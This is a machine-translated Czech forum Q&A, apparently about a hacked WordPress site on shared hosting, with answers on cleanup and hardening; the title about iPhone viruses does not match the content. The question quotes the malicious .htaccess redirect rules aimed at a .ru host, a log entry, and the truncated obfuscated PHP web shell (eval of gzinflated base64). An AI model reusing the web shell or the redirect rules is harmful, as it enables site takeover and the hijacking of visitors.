Jak zkontrolovat virus iPhone

Protože několik málo měsíců je klientská webová stránka napadena roboty. Změnil jsem zdroj webu (nyní wordpress poslední verze), zkuste vyčistit, ale bot najít díru v bezpečnosti ...

Po akci robota najdu soubory .htaccess na webu s tímto uvnitř:

ErrorDocument 400 http://**********.ru/upday/index.php ErrorDocument 401 http://**********.ru/upday/index.php [...] RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite| altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search| metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex| rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch |yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search |walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick |terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey |galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro |suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase |schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L] [...] 

Ve svých souborech protokolu najdu použitý soubor pro přidání .htaccess:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] 'POST /fichiers/cookiemw5.php HTTP/1.1' 200 34 '-' '-' 

S tímto kódem uvnitř:

<?php $auth_pass='';$color='#df5';$default_action='FilesMan';$default_use_ajax=true; $default_charset='Windows-1251';preg_replace('/.*/e','\x65\x76\x61\x6C\x28\x67\x7A \x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64 \x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj AQzKhlHgTkLPCodOWCzQSCFI4 [...] 

Odstraňuji soubory .php, .htaccess, ale objevují se po hodinách nebo minutách ... Jaký je postup při hledání díry / zastavení útoku botů?

(je to na sdíleném hostingu (ovh.com)

  • možný duplikát uživatelů často říká, že je můj web infikován, ale nemůžete o tom najít žádný důkaz?

Základní bezpečnostní kroky

Vzhledem k tomu, že Wordpress je tak oblíbený, existuje spousta možností hackerů, kteří klopýtají a využívají výhod v základním zabezpečení. Všichni uživatelé Wordpressu by měli k ochraně podniknout následující základní a snadné kroky: -

  • Nepoužívejte wp_ jako předponu databázové tabulky, použijte libovolný řetězec náhodných znaků, který se odvolá.
  • Vypněte chyby Wordpress DB.
  • Ujistěte se, že váš adresář je nastaven na chmod 755 a soubory 644.
  • Použijte zabezpečený generátor hesel (použijte alespoň 15 znaků).
  • Nepoužívejte admin jako uživatelské jméno.
  • Vložte prázdný soubor .htaccess do adresáře wp-admin.
  • Přečtěte si posílení Wordpressu
  • Zkontrolujte, zda v mezipaměti Google vašeho webu není skrytý malware.
  • Odstranit <meta name='generator' content='WordPress X.X.X' /> umístěním z hlavičky vašeho webu remove_action('wp_head', 'wp_generator'); ve vašem souboru functions.php (disk útočníky nebude mít snadný způsob, jak zjistit, na kterou verzi cílí).

TimThumb Hack

K dispozici je také velmi populární jednotka hack spojená se starou verzí populárního skriptu tim thumb, který webmasterům způsobuje mnoho problémů. Zkontrolujte, zda ve vašem adresáři pro nahrávání nejsou soubory php, a ujistěte se, že jste upgradovali na nejnovější verzi skriptu, abyste tomu zabránili.

Rada

Používám asi 10 různých Wordpressů a zjistil jsem, že plugin a účet WP-Security od webového obránce jsou neocenitelné, pravidelně skenuje váš web a hlásí chyby zabezpečení, malware a dokonce i chyby stránek prostřednictvím e-mailu, takže si můžete být jisti, že víte, kdy něco pokazí.

WP-Firewall je také velmi užitečný pro obranu proti zneužití 0 dní a VirusTotal je užitečný, pokud máte podezření na infekci.

Akismet a Disqus.com jsou užitečnými nástroji k obraně proti spamu komentářů a měli byste si přečíst wiki komunity komunitních profesionálů na toto téma.

Nástroje pro webmastery

Měli byste se také zaregistrovat do nástrojů pro webmastery, ale pokud máte podezření na infekci, proveďte nejprve všechny kroky k jejímu vyhledání a vyčištění nebo můžete skončit tím, že Google vaše uživatele upozorní, že váš je nahlášený útočný web.

Pokud zjistí infekci, Google zašle e-mail na všechny následující adresy [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] měli byste tedy zajistit, aby alespoň jeden z nich byl zaveden a sledován.

Služby placeného stěhování / Kde získat pomoc

Existuje také řada webů, které nabízejí placené služby odstraňování malwaru velmi podezřelé z nich - mnoho se jeví jako podvody toho či onoho druhu.

K dispozici je spousta vysoce kvalitní pomoci a podpory zdarma ve fórech wordpress, zde na webmaster pro, na wordpress stackexchange site a na stackoverflow. Neplaťte za věci, které můžete opravit sami.

  • @bux žádný problém, zkontrolujte spustitelný soubor v adresáři uploadů, to je nejčastější vektor útoku.
  • Můžete vysvětlit, co dělá prázdný soubor htaccess ve wp-admin?
  • @ joshuahedlund byl navržen tak, aby blokoval útok, který se pokusil zapsat soubor htaccess do adresáře wp-admin. Tuto radu brzy aktualizuji novým kódem, který bude chránit tuto oblast webu heslem a úplně k němu zablokovat přístup.

Musíte úplně odstranit všechny soubory z vašeho webu a provést novou instalaci Wordpressu. Je pravděpodobné, že nahrají soubory, které jim umožní nepřetržitý přístup na váš web. To nejlepší, co můžete udělat, pokud nechcete přejít soubor po souboru a pokusit se zjistit, který z nich je úplná instalace od začátku.

  • Dobře, žádné zázračné řešení hehe ^ ^ Mám složku s fotografiemi s tisíci souborů. Bude zábavné tuto část zkontrolovat ^ ^
  • Pokud máte zálohu, může být užitečné i provedení rozdílu.

Pracoval pro vás: Charles Robertson | Chcete nás kontaktovat?